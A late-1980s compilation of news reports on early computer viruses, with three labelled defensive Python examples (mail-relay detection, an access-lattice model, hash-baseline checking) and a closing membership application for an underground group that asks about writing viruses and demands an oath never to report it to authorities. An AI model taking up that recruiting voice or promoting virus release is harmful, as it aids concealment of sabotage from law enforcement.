Viruses have the eerie ability to perch disguised among legitimate data
|
||
just as biological viruses hide among genes in human cells, then spring out
|
||
unexpectedly, multiplying and causing damage. Experts say that even when
|
||
they try to study viruses in controlled conditions, the programs can get out
|
||
of control and erase everything in a computer. The viruses can be virtually
|
||
impossible to stop if their creators are determined enough.
|
||
|
||
"The only way to protect every-body from them is to do something much
|
||
worse than the viruses: Stop talking to one another with computers," says
|
||
William H. Murray, an information-security specialist at Ernst and Whinney
|
||
financial consultants in Hartford, Connecticut.
|
||
|
||
Hundreds of programs and files have been destroyed by viruses, and
|
||
thousands of hours of repair or prevention time have been logged.
|
||
Programmers have quickly produced antidote programs with such titles as
|
||
"Vaccine," "Flu Shot," "Data Physician," "Syringe."
|
||
|
||
Experts says known damage is minimal compared with the huge, destructive
|
||
potential. They express the hope that the attacks will persuade computer
|
||
users to minimize access to programming and data.
|
||
|
||
"What we are dealing with here is the fabric of trust in society," says
|
||
Murray. "With computer viruses, we have a big vulnerability."
|
||
|
||
Early this year, Aldus Corporation discovered that a virus had been
|
||
introduced that infected at least five-thousand copies of a new drawing
|
||
program called Freehand for the Macintosh computer. The infected copies were
|
||
packaged, sent to stores and sold. On March 2, the virus interrupted users
|
||
by flashing this message on their screens:

"Richard Brandow, publisher of MacMag, and its entire staff would like
to take this opportunity to convey their universal message of peace to all
Macintosh users around the world."

Viruses are the newest of evolving methods of computer mayhem, says
Donn B. Parker, a consultant at SRI International, a computer research firm
in Menlo Park, California. One is the "Trojan horse," a program that looks
and acts like a normal program but contains hidden commands that eventually
take effect, ordering mischief. Others include the "time bomb," which
explodes at a set time, and the "logic bomb," which goes off when the
computer arrives at a certain result during normal computation. The "salami
attack" executes barely noticeable small acts, such as shaving a
penny from thousands of accounts.

The computer virus has the capability to command the computer to make
copies of the virus and spread them. A virus typically is written only as a
few hundred characters in a program containing tens of thousands of
characters. When the computer reads legitimate instructions, it encounters
the virus, which instructs the computer to suspend normal operations for a
fraction of a second.

During that time, the virus instructs the computer to check for other
copies of itself and, if none is found, to make and hide copies. Instructions
to commit damage may be included. A few infamous viruses found in the past
year include:

[] The "scores" virus. Named after a file it spawns, it recently entered
   several hundred Macintosh computers at N.A.S.A. headquarters. "It looks
   as if it is searching for a particular Macintosh program with a name that
   no one recognizes," spokesman Charles Redmond says.

   This virus, still spreading, has reached computers in Congress'
   information system, at the National Oceanic and Atmospheric
   Administration and at Apple Computer Incorporated's government-systems
   office in Reston, Virginia. It has hit individuals, businesses and
   computer "bulletin boards" where computer hobbyists share information.
   It apparently originated in Dallas, Texas and has caused damage, but
   seemingly only because of its clumsiness, not an instruction to do
   damage.

[] The "brain" virus. Named by its authors, it was written by two brothers
   in a computer store in Lahore, Pakistan, who put their names, addresses
   and phone number in the virus. Like "scores," it has caused damage
   inadvertently, ordering the computer to copy itself into space that
   already contains information.

[] The "Christmas" virus. It struck last December after a West German
   student sent friends a Christmas message through a local computer
   network. The virus told the receiver's computer to display the
   greeting, then secretly send the virus and message to everyone on the
   recipient's regular electronic mailing list.

   The student apparently had no idea that someone on the list had
   special, restricted access to a major world-wide network of several
   thousand computers run by I.B.M. The network broke down within hours
   when the message began multiplying, stuffing the computers' memories.
   No permanent damage was done, and I.B.M. says it has made repetition
   impossible.
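The Christmas virus spread by turning every recipient into a sender of the same
message within minutes. A mail administrator can watch the relay log for exactly
that shape: a subject that keeps being sent on by people who only just received
it. The following is an added example, not part of the newsletter and not any
I.B.M. tooling; the log format, user names and timestamps are constructed for
the demonstration, and the one-hour window and the threshold of three relaying
recipients are assumed values, not figures from the article.

```python
# Added example, not from the CPI newsletter: spotting a self-forwarding
# message (the pattern the Christmas virus showed) in a mail relay log.
# The log format, names and timestamps below are constructed for the demo.
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
1987-12-09T09:00:00 from=student to=anna subject=CHRISTMAS
1987-12-09T09:00:00 from=student to=ben subject=CHRISTMAS
1987-12-09T09:05:00 from=anna to=carl subject=CHRISTMAS
1987-12-09T09:05:00 from=anna to=dana subject=CHRISTMAS
1987-12-09T09:06:00 from=ben to=erin subject=CHRISTMAS
1987-12-09T09:06:00 from=ben to=fred subject=CHRISTMAS
1987-12-09T09:10:00 from=carl to=gina subject=CHRISTMAS
1987-12-09T09:10:00 from=dana to=hugo subject=CHRISTMAS
1987-12-09T09:15:00 from=ops to=anna subject=MAINTENANCE
1987-12-09T09:15:00 from=ops to=ben subject=MAINTENANCE
1987-12-09T11:30:00 from=anna to=ops subject=MAINTENANCE
"""

LINE = re.compile(r"^(\S+) from=(\S+) to=(\S+) subject=(\S+)$")


def parse_log(text):
    """Return (time, sender, recipient, subject) tuples in time order."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            stamp, sender, rcpt, subj = m.groups()
            events.append((datetime.fromisoformat(stamp), sender, rcpt, subj))
    return sorted(events)


def chain_forwarders(events, window=timedelta(hours=1)):
    """Per subject: the senders who had themselves received that subject
    within `window` before sending it on. A human reply produces one or two
    such senders; a self-mailing program produces nearly every recipient."""
    first_received = defaultdict(dict)   # subject -> recipient -> first seen
    forwarders = defaultdict(set)        # subject -> senders that relayed it
    for when, sender, rcpt, subj in events:
        got = first_received[subj].get(sender)
        if got is not None and timedelta(0) <= when - got <= window:
            forwarders[subj].add(sender)
        first_received[subj].setdefault(rcpt, when)
    return forwarders


def flag_self_mailing(events, threshold=3, window=timedelta(hours=1)):
    """Subjects relayed onward by at least `threshold` distinct recipients."""
    relayed = chain_forwarders(events, window)
    return sorted(s for s, senders in relayed.items() if len(senders) >= threshold)


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for subj, senders in chain_forwarders(evs).items():
        print(f"{subj}: relayed by {sorted(senders)}")
    print("flagged:", flag_self_mailing(evs))
```

The MAINTENANCE thread is the control case: anna does answer it, but two hours
later, so it never counts as a relay. CHRISTMAS is relayed by four recipients
inside ten minutes and is the only subject flagged.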

Demonstrations have shown that viruses can invade the screens of users
with the highest security classification, according to Fred Cohen of
Cincinnati, a researcher who coined the term "computer viruses." A standard
computer-protection device at intelligence agencies, he says, denies
access by a person at one security level to files of anyone else at a higher
level and allows reading but denies writing of files of anyone lower.

This, however, "allows the least trusted user to write a program that
can be used by everyone" and is "very dangerous," he says.

Computers "are all at risk," says Cohen, "and will continue to be... not
just from computer viruses. But the viruses represent a new level of threat
because of their subtleness and persistence."

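Cohen's point about the agencies' protection device can be checked with a few
lines of code. The following is an added example, not from the newsletter and
not Cohen's own work: it encodes the two rules he describes (no reading above
your level, no writing below it), then computes how far a program written by the
least trusted user can spread once every higher-level user is allowed to run it,
and contrasts that with a rule set that confines execution and writing to a
single level. The level names and the four sample programs are constructed.

```python
# Added example, not from the CPI newsletter: a small model of the
# "no read up / no write down" lattice Cohen describes, used to compute how
# far a program written at the lowest level can spread if every higher-level
# user is allowed to run it. Level names and the sample programs are
# constructed for the demonstration.
from dataclasses import dataclass

LEVELS = ["unclassified", "confidential", "secret", "top_secret"]


def rank(level: str) -> int:
    return LEVELS.index(level)


# The two rules as Cohen summarises them for the agencies' protection device.
def blp_read(subject: str, obj: str) -> bool:
    """A subject may read (and so execute) files at or below its own level."""
    return rank(subject) >= rank(obj)


def blp_write(subject: str, obj: str) -> bool:
    """A subject may write files at or above its own level, never below it."""
    return rank(subject) <= rank(obj)


# A stricter pair of rules that confines sharing to one level: execute and
# modify only programs stored at the subject's own level.
def same_level(subject: str, obj: str) -> bool:
    return rank(subject) == rank(obj)


@dataclass(frozen=True)
class Program:
    name: str
    level: str


# One program stored at each classification level (constructed sample data).
SAMPLE_PROGRAMS = [
    Program("editor", "unclassified"),
    Program("report_tool", "confidential"),
    Program("analysis", "secret"),
    Program("briefing", "top_secret"),
]


def infection_reach(seed: Program, programs, may_exec, may_write) -> set:
    """Transitive closure of 'who may run it' x 'what they may write'.

    An infected program runs with the rights of whoever executes it, so it
    can rewrite every program that subject may write; those copies are then
    run by their own users, and so on until nothing new is reachable."""
    infected = {seed}
    frontier = [seed]
    while frontier:
        prog = frontier.pop()
        for subject in LEVELS:
            if not may_exec(subject, prog.level):
                continue
            for target in programs:
                if target not in infected and may_write(subject, target.level):
                    infected.add(target)
                    frontier.append(target)
    return infected


def reach_under_blp(seed: Program = SAMPLE_PROGRAMS[0]) -> set:
    """Spread of a low-level program under Cohen's two rules."""
    return infection_reach(seed, SAMPLE_PROGRAMS, blp_read, blp_write)


def reach_under_same_level(seed: Program = SAMPLE_PROGRAMS[0]) -> set:
    """Spread of the same program when execution and writing stay on-level."""
    return infection_reach(seed, SAMPLE_PROGRAMS, same_level, same_level)


if __name__ == "__main__":
    low = SAMPLE_PROGRAMS[0]
    print("no read up / no write down:", sorted(p.name for p in reach_under_blp(low)))
    print("same-level only:           ", sorted(p.name for p in reach_under_same_level(low)))
```

Under the two rules Cohen describes, the unclassified editor reaches every
program at every level: a top-secret user is allowed to read it, and once it
runs with that user's rights it is allowed to write top-secret files. Confining
execution and writing to the subject's own level leaves the same program stuck
where it started, which is the trade-off between sharing and containment that
Cohen calls "very dangerous" to get wrong.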

1.) Computer "viruses" are actually immature computer programs. Most are
    written by malicious programmers intent on destroying information in
    computers for fun.

2.) Those who write virus programs often conceal them on floppy disks that
    are inserted in the computer. The disks contain all programs needed to
    run the machine, such as word processing programs, drawing programs or
    spread sheet programs.

3.) A malicious programmer makes the disk available to others, saying it
    contains a useful program or game. These programs can be lent to others
    or put onto computerized "bulletin boards" where anyone can copy them
    for personal use.

4.) A computer receiving the programs will "read" the disk and the tiny virus
    program at the same time. The virus may then order the computer to do a
    number of things:

    A.) Tell it to read the virus and follow instructions.

    B.) Tell it to make a copy of the virus and place it on any disk inserted
        in the machine today.

    C.) Tell it to check the computer's clock, and on a certain date destroy
        information that tells it where data is stored on any disk: if an
        operator has no way of retrieving information, it is destroyed.

    D.) Tell it not to list the virus programs when the computer is asked for
        an index of programs.

5.) In this way, the computer will copy the virus onto many disks--perhaps
    all or nearly all the disks used in the infected machine. The virus may
    also be passed over the telephone, when one computer sends or receives
    data from another.

6.) Ultimately hundreds or thousands of people may have infected disks and
    potential time bombs in their systems.

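Steps 4B and 4D above describe the two things a defender can actually look for
on a disk: a program whose contents have changed, and a file that the directory
index no longer shows. Hashing every file, dotfiles included, against a stored
baseline catches both. The following is an added example, not from the
newsletter: it takes a baseline of a disk, simulates the tampering the list
describes, and reports what changed. The file names and contents are
constructed, and the layout under a temporary directory is an assumption made so
that the example runs offline.

```python
# Added example, not from the CPI newsletter: a baseline-and-verify check for
# the program files on a disk. Steps 4B and 4D of the list describe a virus
# copying itself into programs and hiding from the directory listing; hashing
# every file (hidden ones included) and comparing against a stored baseline
# surfaces both. Paths and contents here are constructed for the demo.
import hashlib
import os
import tempfile


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> dict:
    """Map every regular file under root (dotfiles included) to its hash."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_of(full)
    return manifest


def compare_manifests(baseline: dict, current: dict) -> dict:
    """Report files added, removed or changed since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


def run_demo() -> dict:
    """Simulate a clean disk, a later tampering, and the verify step."""
    with tempfile.TemporaryDirectory() as disk:
        progs = os.path.join(disk, "progs")
        os.mkdir(progs)
        with open(os.path.join(progs, "editor.exe"), "wb") as f:
            f.write(b"EDITOR v1.0 original code")
        with open(os.path.join(progs, "draw.exe"), "wb") as f:
            f.write(b"DRAW v2.1 original code")
        baseline = build_manifest(disk)

        # Constructed tampering: one program gains extra bytes (step 4B), and
        # a new dotfile appears that a plain listing would not show (step 4D).
        with open(os.path.join(progs, "editor.exe"), "ab") as f:
            f.write(b" + appended bytes")
        with open(os.path.join(disk, ".hidden.bin"), "wb") as f:
            f.write(b"unexpected file")

        return compare_manifests(baseline, build_manifest(disk))


if __name__ == "__main__":
    for kind, paths in run_demo().items():
        print(f"{kind:9s} {paths}")
```

The baseline only helps if it was taken from a disk known to be clean and is
stored where the machine being checked cannot rewrite it; a manifest kept on the
same infected disk is just one more file the virus could update.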
-----------------------------------------------
'Virus' infected hospital computers,
led to epidemic of software mix-ups
-----------------------------------------------
From the San Diego Tribune
March 23, 1989


BOSTON (UPI) -- A "virus" infected computers at three Michigan hospitals
last fall and disrupted patient diagnoses at two of the centers in what appears
to be the first such invasion of a medical computer, it was reported yesterday.

The infiltration did not harm any patients but delayed diagnoses by
shutting down computers, creating files of non-existent patients and garbling
names on patient records, which could have caused more serious problems, a
doctor said.

"It definitely did affect care in delaying things and it could have
affected care in terms of losing this information completely," said Dr. Jack
Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak,
Mich., two of the hospitals involved.

If patient information had been lost, the virus could have forced doctors
to repeat tests that involve exposing patients to radiation, Juni said
yesterday. The phony and garbled files could have caused a mix-up in patient
diagnosis, he said.

"This was information we were using to base diagnoses on," said Juni, who
reported the case in a letter in The New England Journal of Medicine. "We were
lucky and caught it in time."

A computer virus is a set of instructions designed to reproduce and spread
from computer to computer. Some viruses do damage in the process, such as
destroying files or overloading computers.

Paul Pomes, a computer virus expert at the University of Illinois in
Champaign, said this was the first case he had heard of in which a virus had
disrupted a computer used for patient care or diagnosis in a hospital.

Such disruptions could become more common as personal computers are used
more widely in hospitals, Juni and Pomes said. More people know how to program
-- and therefore sabotage -- personal computers than the more specialized
computers that previously have been used, Pomes said.

The problem in Michigan surfaced when a computer used to display images
used to diagnose cancer and other diseases began to malfunction at the 250-bed
Troy hospital in August 1988.

In October, Juni discovered a virus in the computer in the Troy hospital.
The next day, Juni found the same virus in a similar computer in the 1,200-bed
Royal Oak facility, he said.

The virus apparently arrived in a program in a storage disk that was part
of the Troy computer system, he said. It probably was spread inadvertently to
the Royal Oak computer on a floppy disk used by a resident who worked at both
hospitals to write a research paper, he said.

The virus also spread to the desk-top computers at the University of
Michigan Medical Center in Ann Arbor, where it was discovered before it caused
problems.


"Prosecutor Wins Conviction In Computer Data Destruction"

September 21, 1988


Fort Worth, Texas (AP) - A former programmer has been convicted of planting
a computer "virus" in his employer's system that wiped out 168,000 records and
was activated like a time bomb, doing its damage two days after he was fired.

Tarrant County Assistant District Attorney Davis McCown said he believes he
is the first prosecutor in the country to have someone convicted for destroying
computer records using a "virus."

"We've had people stealing through computers, but not this type of case,"
McCown said. "The basis for this offense is deletion."

"It's very rare that the people who spread the viruses are caught," said
John McAfee, chairman of the Computer Virus Industry Association in Santa Clara,
which helps educate the public about viruses and find ways to fight them.

"This is absolutely the first time" for a conviction, McAfee said.

"In the past, prosecutors have stayed away from this kind of case because
they're too hard to prove," McCown said yesterday. "They have also been reluctant
because the victim doesn't want to let anyone know there has been a breach of
security."

Donald Gene Burleson, 40, was convicted of charges of harmful access to a
computer, a third-degree felony that carries up to 10 years in prison and up to
$5,000 in fines.

A key to the case was the fact that State District Judge John Bradshaw
allowed the computer program that deleted the files to be introduced as
evidence, McCown said. It would have been difficult to get a conviction
otherwise, he said.

The District Court jury deliberated six hours before bringing back the
first conviction under the state's 3-year-old computer sabotage law.

Burleson planted the virus in revenge for his firing from an insurance
company, McCown said.

Jurors were told during a technical and sometimes-complicated three-week
trial that Burleson planted a rogue program in the computer system used to store
records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm.

A virus is a computer program, often hidden in apparently normal computer
software, that instructs the computer to change or destroy information at a
given time or after a certain sequence of commands.

The virus, McCown said, was activated Sept. 21, 1985, two days after
Burleson was fired as a computer programmer, because of alleged personality
conflicts with other employees.

"There were a series of programs built into the system as early as Labor
Day (1985)," McCown said. "Once he got fired, those programs went off."

The virus was discovered two days later, after it had eliminated 168,000
payroll records, holding up company paychecks for more than a month. The virus
could have caused hundreds of thousands of dollars in damage to the system had
it continued, McCown said.

WEST COAST CORRUPTED ALLEGIANCE PRESENTS:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

>> CORRUPTED PROGRAMMING INTERNATIONAL <<
>> MEMBERSHIP APPLICATION <<

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(CPI is a sub-group of WCCA)

NOTE: The following information is of a totally confidential nature. We must
      question you in depth and thoroughly so that our knowledge and idea
      of you will be quite complete. Remember, it is our voting members
      who will decide upon your membership, as the result of your
      response to this questionnaire. Please answer the following completely
      and to the best of your ability. Also note that we may decide to voice
      validate you or gather any other information through other sources and
      will discover if you have placed false or misleading information on
      this application.


PERSONAL INFORMATION:
-----------------------------------------------------------------------------
Alias(es) You HAVE Used :
Alias(es) You Currently Use :
Your FULL REAL Name :
Your Voice Phone Number :(###)###-####
Your Data Phone Number :(###)###-####
Your Mailing Address :
Your City, State & Zip :
Your Age :
Occupation/Grade :
Place of Employment/School :
Work Phone Number :
Your Interests And Hobbies :

Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency?
If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN)
:
:

Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone,
Data, Or Long Distance Type Of Company? If So, In What Way?
:
:


COMPUTER INFORMATION/EXPERIENCE
-----------------------------------------------------------------------------
Computer Experience (time) :
Modeming Experience (time) :
BBS's You Frequent (Name/#) :
Some Elite References :
Computers You Have Used :
Computer(s) You Are Using :
Computer You Prefer :
Languages You Have Tried :
Languages You Know Well :
Your Best Language :
Have You Ever Phreaked :
Do You Phreak Regularly :
Have You Ever Hacked :
Do You Hack Regularly :
Have You Ever Cracked :
Do You Crack Regularly :
Ever Made A Virus/Trojan :
Major Accomplishments :
:

INTERVIEW
-----------------------------------------------------------------------------
Answer In 4 Lines Or Less:

What do you think Corrupted Programming International is?
:
:
:
:

When did you first hear about CPI?
:
:
:
:

Why do you want to be a member of CPI?
:
:
:
:

Do you know any of the members of CPI? Can you name any of the founders of CPI?
:
:
:
:

Have you considered the distribution of Viruses/Trojans as a "crime"? Why
or why not? Have you ever considered the consequences that could result
from the acts of releasing a Virus/Trojan? (morally speaking?)
:
:
:
:

Have you written any text files? (On any underground type of subject)
:
:
:
:

Are you a member of any other group(s)? Can you name them and their HQ BBS?
:
:
:
:

What would you consider yourself if you were admitted into CPI, a programmer,
a phreaker, a distributor, an information gatherer, or a vegetable?
:
:
:
:

Why would you ever want to release or aid in releasing a potential virus/trojan
to the public?
:
:
:
:

Can you contribute to CPI? How?
:(do you have access to info concerning virus/trojans)
:(exceptional programmer?)
:(got connections?)
:(anything extraordinary?)


OATH
-----------------------------------------------------------------------------
Typing your name at the bottom of the following paragraph is the same as
signing your name on an official document.

authorities - As stated in the document below, the term authorities shall
              be defined as any law enforcement agency or any agency that
              is/may be affiliated with any law enforcement agency. Also,
              this includes any company or agency or person which is/may
              be involved with the telephone company or any telephone-type
              of service(s).

I [your name here] do solemnly swear never to report, to my peers or to
the authorities, the actions and duties performed by this group, Corrupted
Programming International, on any account. Also, I realize that if I leave
CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold
the greatest confidence of CPI's activities, and I agree that any information I
may report to any one or any thing CANNOT be used against CPI and its members
in a court of law. I fully understand that if I were to become affiliated with
the authorities that it would be my duty to remove myself from any membership
if my position presented itself as contradictory towards the group, CPI and its
members. I also comprehend that if I were to be confronted by the authorities,
it is my duty as a CPI member, as signed below, never to disclose or discuss
CPI's activities to them; however, if I do, I fully agree that the information
disclosed or discussed cannot then be used against CPI or any member(s) of CPI
in a court of law. I further agree that all the terms and restrictions as noted
above also correspond to the entire group of WCCA, West Coast Corrupted
Allegiance.

Typed:____________________


-----------------------------------------------------------------------------
.Answer Each Question To The Best And Fullest Of Your Ability.
-----------------------------------------------------------------------------

Upload ALL Applications To The WCCA Headquarters BBS

T H E   A N D R O M E D A   S T R A I N

Future WCCA Support BBS's Will Be Active - Applications May Be Turned In Then
